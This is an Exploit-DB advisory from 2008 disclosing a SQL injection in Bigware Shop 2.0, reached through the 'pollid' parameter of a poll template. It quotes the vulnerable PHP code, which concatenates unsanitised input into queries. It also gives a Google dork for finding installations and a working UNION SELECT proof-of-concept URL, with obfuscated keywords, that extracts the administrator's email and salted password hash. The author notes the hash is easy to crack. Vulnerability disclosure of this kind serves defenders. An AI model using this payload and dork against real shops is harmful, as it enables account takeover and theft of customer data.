Bigware Shop 2.0 - 'pollid' SQL Injection

EDB-ID:

5002

Author:

D4m14n

Type:

webapps

Platform:

PHP

Published:

2008-01-29

###########################
###Bigware Shop 2.0########
#####################################################################
# Bug found by D4m14n  
# Vendor: http://www.bigware.de/
# Vuln. Version: 2.0 (prior versions also may be affected)
# Email: delta-1@secure-mail.net
#
# GoogleDork: "Diese Shopsoftware wurde entwickelt von Bigware"
#####################################################################

There's a SQL-Injection in "main_bigware_53.tpl.php"!
You can find more than this Injection in the Sourcecode (RFI,SQL-Injections).

#####################################################################
Sourcecode:
if (!isset($_GET['op'])) {
    $_GET['op']="list";
    }
switch ($_GET['op']) {
    case "results":
        if (isset($_GET['pollid'])) {
            $pollid=$_GET['pollid'];
        } else {
        $pollid=1;
        }
              $poll_query = go_db_query("SELECT pollid, timeStamp FROM phesis_poll_desc WHERE pollid='".$pollid."'");    
              $polls = go_db_fetch_array($poll_query);
                      $title_query = go_db_query("select optionText from phesis_poll_data where pollid=$pollid and voteid='0' and language_id = '" . $languages_id . "'");
                      $title = go_db_fetch_array($title_query);

#####################################################################
Proof-of-Concept:

main_bigware_53.php?op=results&pollid=-1/**/and/**/voteid=0/**/and/**/language_id=5/**/and/**/1=1/**/UnIOn/**/SeLeCt/**/ConCat(former_email_address,0x3a,former_password)/**/FrOM/**/former/**/WhEre/**/former_id=1/*

#####################################################################

You can see the Admins Email-Adress and his SALTED passwordhash (cracking this hash is very easy)

#####################################################################

If you are searching for a Coder, who searches Security-Holes in your Web-Applications,
feel free to contact me!
GreetZ 2 Shadowleet and some more ;)

PS: Immer wenn mir langweilig ist, dann veröffentliche ich Sicherheitslücken... 

# milw0rm.com [2008-01-29]